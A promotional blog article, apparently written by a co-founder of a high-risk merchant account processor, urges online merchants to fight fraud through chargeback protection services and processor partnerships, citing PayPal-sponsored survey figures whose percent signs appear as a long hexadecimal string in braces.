As consumers shift more and more of their shopping habits to digital platforms, the threat and risk of fraud continues to rise. New, unrelenting fraud tactics are emerging everywhere you turn. According to a recent study commissioned by PayPal, “Adaptive ML: The Future Of E-Commerce Fraud Management”, 97{7a5fcad74e69fd0a1026100c5038d51c4a14812d5f844112640eb667c4d02bd8} of global fraud prevention decion-makers at ecommerce companies experienced fraud over the last two years.

Another study sponsored by PayPal found that 81{7a5fcad74e69fd0a1026100c5038d51c4a14812d5f844112640eb667c4d02bd8} of organizations are in a more vulnerable position because of the digital transformation of the last few years. This fraud has led to losses in sales and revenue, wasted resources focused on resolving issues and damaged customer experiences. For growing businesses today, it’s a delicate balance of protecting customers while also delivering a satisfactory experience that builds loyal relationships.

What is the Business Owner’s Answer to Fraud?

Managing fraud and risk is easier said than done, but there are solutions that can help. While there’s no one-size-fits-all fraud protection solution, there are services available that you can customize to meet your business’ specific needs. Here are a few ways you can strengthen your organization against fraud:

  • Secure chargeback prevention services. Unfortunately, chargebacks are a normal part of running a business. Even so, you shouldn’t have to handle them all on your own. There are many tools available today that will help you be proactive and automate disputes.
  • Collaborate with industry experts. Fraud is not an isolated incident. It is an ecosystem that reaches far beyond your business and customers. That being said, collaborating with experts and industry partners can help you come up with solutions that save time, money and resources. This includes reaching out to your processing provider to see what solutions they provide.
  • Strategically use existing data. In the end, fraud management is all about how you use existing data. To prevent high chargeback rates, you need to stay on top of the latest trends and new threats. You need a partner that has the resources and tools to anticipate what will come next.

Maintaining Merchant Accounts with Chargeback Protection

As mentioned, chargeback protection services play a huge part in protecting your business. Partnering with the right credit card processor is a great way to safely and securely accept electronic payments. Industry leading payment processors will specialize in providing merchant account services for businesses of all sizes and industries, including high-risk merchants.

All in all, managing fraud without damaging the customer experience boils down to having the right tools, resources and partnerships in place. Some of the best payment processing companies on the market today can help eligible merchants get approved for chargeback protection services in 24 to 48 hours. Once approved, they gain access to a chargeback mitigation system and other personalized merchant services.

Embrace the Future: Secure Selling

According to recent data, in 2021, U.S. consumers alone said they lost more than $6.1 billion to fraud – an increase of more than 70{7a5fcad74e69fd0a1026100c5038d51c4a14812d5f844112640eb667c4d02bd8} from the previous year. Don’t let chargebacks and other fraud risks discourage you and chip away at your bottom line. And don’t let them negatively impact your customer’s experience with your business. 

WIth the right services, you can get notified of chargebacks immediately, learn more about chargeback insurance, become proactive in the process and keep your hard earned money. Most importantly, you maintain the ability to deliver the best shopping experience to your audience and build a loyal customer base.

Blair Thomas has been a music producer, bouncer, screenwriter and for over a decade has been the proud Co-Founder of eMerchantBroker, the highest rated high risk merchant account processor in the country. He has climbed in the Himalayas, survived a hurricane, and lived on a gold mine in the Yukon. He currently calls Thailand his home with a lifetime collection of his favorite books.

Jolyon Davie

Next Post

Luka Doncic is in rare playoff company, but his supporting cast might separate him from other high-usage stars

Thu Sep 1 , 2022
Luka Doncic leading the Dallas Mavericks to their first Western Conference Finals appearance in 11 years at the age of 23 is impressive on a variety of levels. However, the Atlas-like way Doncic has carried the Mavericks on his shoulders to the NBA Final Four is historic stylistically in that […]

You May Like

Copyright @quantuminsan.com Theme: Default Mag by ThemeInWP
CookieDurationDescription
cookielawinfo-checkbox-analytics11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional11 monthsThe cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy11 monthsThe cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.
Functional
Performance
Analytics
Advertisement
Others